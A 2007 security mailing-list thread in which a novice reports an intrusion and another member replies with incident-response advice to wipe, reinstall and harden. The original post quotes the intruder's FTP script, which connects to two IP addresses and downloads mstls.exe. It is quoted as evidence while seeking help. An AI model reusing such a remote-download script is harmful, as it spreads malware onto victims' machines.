RE: what next

["Devin Rambo" <drambo () vediorps com>]

In short, mstls.exe is bad news:

http://fileinfo.prevx.com/adware/qq8e9f63521498-MSTL30877030/MSTLS.EXE.html

The $64,000 Question is what these goons did to your server that you haven't
detected. You can take steps to remove the malware you know about, but your
best bet is to back up your data, wipe the drive, and do a clean reinstall.
It's the only way to be 100% certain that you've gotten rid of it.

After that, all the standard disclaimers: shut off unused/unnecessary
serves, apply patches, use up-to-date antivirus, harden where possible, etc.
All of which the folks here can offer plenty of advice for doing. Good luck.

Devin


-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of nemanja.janic () centroproizvod co yu
Sent: Tuesday, February 06, 2007 6:38 AM
To: security-basics () securityfocus com
Subject: what next

Hello list,
i wasn't sure where to post this, and since i'm just starting out in
security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among
other things he left behind a file named tt (no extension) which contained
the following lines:

open 80.93.223.22 14547
user 1 1
get mstls.exe
quit
open 80.71.219.134 5191
user 1 1
get mstls.exe
quit

I figure this is some script to be used with ftp, or at least i think so. 
I did tracert to those adresses, but that's where i'm stuck. What can i do
next? 
And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in
size. 
Thanx in advance.